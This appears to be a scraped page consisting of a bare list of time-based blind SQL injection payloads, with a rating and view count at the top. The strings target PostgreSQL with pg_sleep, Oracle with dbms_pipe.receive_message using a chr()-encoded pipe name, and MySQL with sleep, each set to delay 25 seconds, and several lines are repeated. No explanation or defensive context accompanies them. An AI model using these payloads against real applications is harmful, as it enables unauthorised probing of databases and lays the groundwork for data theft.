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Rating: 4.333 (3 votes), Views: 44490



1’;SELECT pg_sleep(25)--

1;SELECT pg_sleep(25)--


1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100 )||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1


1’ || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100 )||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ’

1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100 )||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1

1’ || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100 )||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ’

(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100 )||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)


(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100 )||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)

((select sleep(25)))a-- 1


((select sleep(25)))a-- 1